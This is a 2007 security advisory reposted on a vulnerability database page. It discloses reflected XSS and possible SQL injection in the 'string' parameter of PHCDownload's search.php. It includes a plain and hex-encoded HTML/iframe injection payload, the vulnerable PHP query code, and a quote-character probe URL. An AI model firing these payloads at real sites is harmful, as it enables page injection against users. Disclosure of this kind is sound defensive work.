Vulners
Lucene search
phcdownload-xss.txt
`###############################################
XSS Flaw & posible SQL injection in PHCDownload
vendor url: http://www.phpcredo.com/
Advisore: http://lostmon.blogspot.com/2007/12/
xss-flaw-posible-sql-injection-in.html
vendor notify:YES exploit available: YES
###############################################
New XSS Flaw & posible SQL injection in search.php
PHCDownload contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'string' variable upon submission to 'search.php'
script.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.
verions:
1.1.0 afected.
example :
we can try inject some normal html or javascript code:
Code:
"><h1><a href="http://lostmon.blogspot.com">Lostmon</a> Was Here
!!!</h1><br><h1>XSS Pow@ !!!</h1><p><iframe
src="http://lostmon.blogspot.com"></iframe></p>
or inject directly the code in hex values :
Code:
%22%3E%3C%68%31%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%3C%2F%61%3E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%62%72%3E%3C%68%31%3E%58%53%53%20%50%6F%77%40%20%21%21%21%3C%2F%68%31%3E%3C%70%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E
example in hex:
http://localhost/phcdownload/search.php?string=[XSS-CODE]
also this variable is prone vulnerable too to SQL injections.
if we look the source code of search.php arround line 36 we have :
Code:
// Prepare search query
if( $kernel->config['archive_search_mode'] == 1 )
{
$search_syntax = "MATCH( f.file_name, f.file_description,
f.file_version, f.file_author ) AGAINST (
'*{$kernel->vars['string']}*' IN BOOLEAN MODE )";
}
else
{
$search_syntax = "MATCH( f.file_name, f.file_description,
f.file_version, f.file_author ) AGAINST (
'*{$kernel->vars['string']}*' )";
}
the value of 'string' is inserted directly in the sql query and this
could be dangerous...
we can try to disclose the query :
http://localhost/phcdownload/upload/search.php?string='
i make several probes , but i don´t have found a working exploit or a
exploitable angle to this issue , but ...need to be patch
Thnx to estrella to be my ligth
Thnx to all Lostmon´s Group Team
--
atentamente:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Dec 2007 00:00Current
7.4High risk
Vulners AI Score7.4